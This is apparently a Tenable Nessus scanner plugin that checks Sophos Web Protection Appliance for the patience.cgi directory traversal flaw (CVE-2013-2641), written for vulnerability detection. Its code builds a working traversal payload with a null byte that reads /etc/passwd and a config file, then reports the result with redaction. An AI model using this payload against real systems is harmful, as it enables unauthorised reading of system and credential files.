Sophos Web Protection Appliance patience.cgi 'id' Parameter Directory Traversal

#%NASL_MIN_LEVEL 70300
#
# (C) Tenable Network Security, Inc.
#

include('deprecated_nasl_level.inc');
include('compat.inc');

if (description)
{
  script_id(65874);
  script_version("1.16");
  script_set_attribute(attribute:"plugin_modification_date", value:"2021/01/19");

  script_cve_id("CVE-2013-2641");
  script_bugtraq_id(58833);
  script_xref(name:"EDB-ID", value:"24932");

  script_name(english:"Sophos Web Protection Appliance patience.cgi 'id' Parameter Directory Traversal");
  script_summary(english:"Attempts to read a file.");

  script_set_attribute(attribute:"synopsis", value:
"The remote host is running a web application that is affected by a
directory traversal vulnerability.");
  script_set_attribute(attribute:"description", value:
"The Sophos Web Protection application running on the remote host is
affected by a directory traversal vulnerability in the patience.cgi
script due to improper sanitization of user-supplied input passed to
the 'id' parameter. An unauthenticated, remote attacker can exploit
this to retrieve arbitrary files from the remote host subject to the
privileges of the user running the web server.

Note that the application is reportedly affected by additional
vulnerabilities; however, this plugin has not tested for them.");
  # https://www.sec-consult.com/fxdata/seccons/prod/temedia/advisories_txt/20130403-0_Sophos_Web_Protection_Appliance_Multiple_Vulnerabilities.txt
  script_set_attribute(attribute:"see_also", value:"http://www.nessus.org/u?4aac7176");
  script_set_attribute(attribute:"solution", value:
"Upgrade to Sophos Web Protection Appliance version 3.7.8.2 or later.");
  script_set_cvss_base_vector("CVSS2#AV:N/AC:L/Au:N/C:P/I:N/A:N");
  script_set_cvss_temporal_vector("CVSS2#E:F/RL:OF/RC:C");
  script_set_cvss3_base_vector("CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N");
  script_set_cvss3_temporal_vector("CVSS:3.0/E:F/RL:O/RC:C");

  script_set_attribute(attribute:"exploitability_ease", value:"No exploit is required");
  script_set_attribute(attribute:"exploit_available", value:"true");
  script_set_attribute(attribute:"d2_elliot_name", value:"Sophos Web Protection Appliance 3.7.8.1 RCE");
  script_set_attribute(attribute:"exploit_framework_d2_elliot", value:"true");
  script_set_attribute(attribute:"exploited_by_nessus", value:"true");

  script_set_attribute(attribute:"vuln_publication_date", value:"2013/04/03");
  script_set_attribute(attribute:"patch_publication_date", value:"2013/04/01");
  script_set_attribute(attribute:"plugin_publication_date", value:"2013/04/09");

  script_set_attribute(attribute:"plugin_type", value:"remote");
  script_set_attribute(attribute:"cpe", value:"cpe:/a:sophos:web_appliance");
  script_set_attribute(attribute:"cpe", value:"x-cpe:/a:sophos:sophos_web_protection");
  script_end_attributes();

  script_category(ACT_ATTACK);
  script_family(english:"CGI abuses");

  script_copyright(english:"This script is Copyright (C) 2013-2021 and is owned by Tenable, Inc. or an Affiliate thereof.");

  script_dependencies("sophos_web_protection_detect.nasl");
  script_require_keys("installed_sw/sophos_web_protection");
  script_require_ports("Services/www", 443);

  exit(0);
}

include("audit.inc");
include("global_settings.inc");
include("misc_func.inc");
include("http.inc");
include("webapp_func.inc");
include("data_protection.inc");

appname = 'Sophos Web Protection';

get_install_count(app_name:'sophos_web_protection', exit_if_zero:TRUE);
port = get_http_port(default:443);
install = get_single_install(app_name:'sophos_web_protection', port:port);

vuln_script = install['dir'] + '/cgi-bin/patience.cgi';

files = make_list('/etc/passwd', 'shared.conf');

file_pats = make_array();
file_pats['/etc/passwd'] = "root:.*:0:[01]:";
file_pats['shared.conf'] = '# Generated by Sophox postinstall\\.';    # nb: yes, that's supposed to be "Sophox" and not "Sophos"

contents = '';
vuln_req = '';
found_file = '';
foreach file (files)
{
  # Try to exploit the issue
  if (file[0] == '/')
    exploit = mult_str(str:'../', nb:12) + file + '%00';
  else
    exploit = mult_str(str:'../', nb:2) + '/persist/config/' + file + '%00';

  url = vuln_script + '?id=' + exploit;

  res = http_send_recv3(method:"GET", item:url, port:port, exit_on_fail:TRUE);

  if (egrep(pattern:file_pats[file], string:res[2]))
  {
    found_file = file;
    vuln_req = url;

    contents = res[2];
    break;
  }
}
if (!vuln_req) audit(AUDIT_WEB_APP_NOT_AFFECTED, appname, build_url(port:port, qs:install['dir']));

if (report_verbosity > 0)
{
  line_limit = 10;
  trailer = '';

  if ('shared.conf' >< found_file)
  {
    header =
      'Nessus verified the issue by trying to include the application\'s own\n' +
      '\'' + found_file + '\' script and verifying its output in the response\n' +
      'stream using the following URL';

    if (report_verbosity > 1)
    {
      contents = data_protection::redact_etc_passwd(output:contents);
      trailer =
        'Here is its output (limited to ' + line_limit + ' lines) :\n' +
        '\n' +
        crap(data:'-', length:30) + ' snip ' + crap(data:'-', length:30) + '\n' +
        beginning_of_response(resp:contents, max_lines:line_limit) +
        crap(data:'-', length:30) + ' snip ' + crap(data:'-', length:30);
    }
  }
  else
  {
    header =
      'Nessus was able to exploit the issue to retrieve the contents of\n' +
      '\'' + found_file + '\' on the remote host using the following URL';

    if (report_verbosity > 1)
    {
      contents = data_protection::redact_etc_passwd(output:contents);
      trailer =
        'Here are its contents (limited to ' + line_limit + ' lines) :\n' +
        '\n' +
        crap(data:'-', length:30) + ' snip ' + crap(data:'-', length:30) + '\n' +
        beginning_of_response(resp:contents, max_lines:line_limit) +
        crap(data:'-', length:30) + ' snip ' + crap(data:'-', length:30);
    }
  }

  report = get_vuln_report(items:vuln_req, port:port, header:header, trailer:trailer);
  security_warning(port:port, extra:report);
}
else security_warning(port);